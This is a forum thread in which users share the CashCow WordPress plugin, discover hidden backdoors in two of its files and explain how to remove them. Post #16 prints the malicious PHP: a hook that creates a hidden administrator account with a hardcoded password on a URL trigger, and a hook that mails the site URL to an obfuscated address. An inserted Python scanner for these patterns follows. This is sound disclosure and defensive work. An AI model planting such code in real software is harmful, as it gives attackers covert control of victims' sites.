
10-29-2013, 08:35 PM
Post: #11
RE:
Sure thing Batmans
Here is the archive: CashCow.zip
And here is the VirusTotal link: VirusTotal

Would be better if someone creates mirrors.
10-29-2013, 08:43 PM
Post: #12
RE:
Excellent my friend. Just curious what do you think of this script so far? Is it producing results?
10-29-2013, 08:49 PM
Post: #13
RE:
Not sure if allowed, but: ThemesDeposit
d***... I forgot to add the theme for this plugin. I will add it ASAP, but right now I am checking the theme for malicious code.
10-29-2013, 09:06 PM
Post: #14
RE:
Here's the theme: CashCowTheme.zip
And VirusTotal link: VirusTotal
10-30-2013, 08:30 AM
Post: #15
RE:
Thanks for the detail. I asked you because I don't know how to do that. +reps
(10-29-2013 07:56 PM)cipiceuca24 Wrote:  
(10-29-2013 07:22 PM)GreenPeace Wrote:  How do you know which file is sending mail and how do you locate any file's bandwidth usage? Would love to know these. Smile
(10-29-2013 08:45 AM)cipiceuca24 Wrote:  Two files that are not clear for me: inc.php and langs.php in categories directory. I have deleted both files and the plugin is working normally.

L.E.: One of those two files was sending an enormous number of mails to wordpress@yandex.ru. In 2 weeks those two files have consumed 750GB of bandwidth.
Pretty simple. Go to /var/spool/mail/. Click on your username and check for the Subject line in the log. You will have to have mail.add_x_header = On in php.ini. So, every mail sent from a PHP file will be logged.

Nothing installed on the VPS but a WordPress CMS with CashCow. With those two files on my system, the VPS was taken down by my hosting provider (had to upgrade the package in order to get it back live faster). Result is this: [Image: result.png]

When the same VPS, with other scripts installed, never consumed more than 30-35 GB of bandwidth monthly.

1st step (because not knowing the problem) - cleared mqueue and clientmqueue - nothing, after 5 minutes those mail directories were full with hundreds of files.
2nd step - activated mail headers in php.ini.
3rd step - I have removed both files, cleared mqueue and clientmqueue and suddenly, after removing those files, no mail was sent anymore.

Finally... what's your point? Do you wanna know how I discovered these files or have you written just for fun?
Having this VPS for years, I am pretty sure how much bandwidth I consume every month.
11-29-2013, 03:12 AM (This post was last modified: 11-29-2013 03:28 AM by Neo2SHYAlien.)
Post: #16
RE:
This plugin has 2 "backdoors". Both of them are in the plugin's categories directory.
  • The first one is in inc.php, which tries to create a new user with the name wordpress and password 6b6TkpF9bJ. Full path: CashCow/categories/inc.php
PHP Code:
add_action('wp_head', 'wp_func_tabs5');
function wp_func_tabs5() {
    // Hooked on wp_head; acts only when the request carries ?cms=go
    if ($_GET['cms'] == 'go') {
        require('wp-includes/registration.php');
        if (!username_exists('wordpress')) {
            $user_id = wp_create_user('wordpress', '6b6TkpF9bJ');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
  • The second one is in langs.php and sends the blog URL to a Yandex mail address. Full path: CashCow/categories/langs.php
PHP Code:
add_action('wp_head', 'my_wpfunww7c8bb');
function my_wpfunww7c8bb() {
    if (!username_exists('wordpress')) {
        // Recipient address is stored base64-encoded
        $addressdecode = base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");
        $vari = 'Wordpress Plugin';
        wp_mail($addressdecode, $vari, get_bloginfo('wpurl'));
    }
}

Fix -> Remove all content from those files and everything should be OK
Another fix -> remove this code from the CashCow index.php file

PHP Code:
include 'categories/inc.php';
include 'categories/langs.php';
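A static check for the two patterns quoted in post #16, as an added example that is not part of the thread or of the plugin's code. The rule names, `scan_php` and the sample file bodies are constructed for illustration; only the function names it searches for (`wp_create_user`, `set_role`, `wp_mail`, `base64_decode`) come from the quoted snippets.

```python
import base64
import re

# Pattern 1 (inc.php in the post): a user is created and promoted to administrator.
CREATE_ADMIN = re.compile(
    r"wp_create_user\s*\(.*?set_role\s*\(\s*['\"]administrator['\"]", re.S)
REQUEST_PARAM = re.compile(r"\$_(?:GET|POST|REQUEST)\s*\[")
# Pattern 2 (langs.php in the post): wp_mail() to an address hidden in a base64 literal.
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]")
EMAIL = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")


def scan_php(source):
    """Return a list of (rule, detail) findings for one PHP source string."""
    findings = []
    if CREATE_ADMIN.search(source):
        trigger = "request parameter" if REQUEST_PARAM.search(source) else "unconditional"
        findings.append(("admin-user-creation", trigger))
    for blob in B64_LITERAL.findall(source):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text, so not a hidden address
        if EMAIL.fullmatch(text) and "wp_mail" in source:
            findings.append(("mail-to-hidden-address", text))
    return findings


# Constructed sample inputs (placeholder names and address, not the plugin's files).
_HIDDEN = base64.b64encode(b"collector@example.invalid").decode()
SAMPLES = {
    "categories/inc.php": "<?php add_action('wp_head','f1'); function f1(){"
                          " if($_GET['k']=='v'){ $id=wp_create_user('name','secret');"
                          " $u=new WP_User($id); $u->set_role('administrator'); } }",
    "categories/langs.php": "<?php add_action('wp_head','f2'); function f2(){"
                            " $to=base64_decode('" + _HIDDEN + "');"
                            " wp_mail($to,'subject',get_bloginfo('wpurl')); }",
    "clean.php": "<?php wp_mail($admin_email, 'Report', $body);",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan_php(body))
```

To check a real install, read each `.php` file under `wp-content/plugins` and `wp-content/themes` and pass its text to `scan_php`; a hit is a reason to read the file, not proof by itself.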
01-04-2014, 12:01 PM
Post: #17
RE:
Anyone have version 2? This is version 1.2
Thanks!
07-07-2014, 04:33 AM
Post: #18
RE:
New Update V2.1.1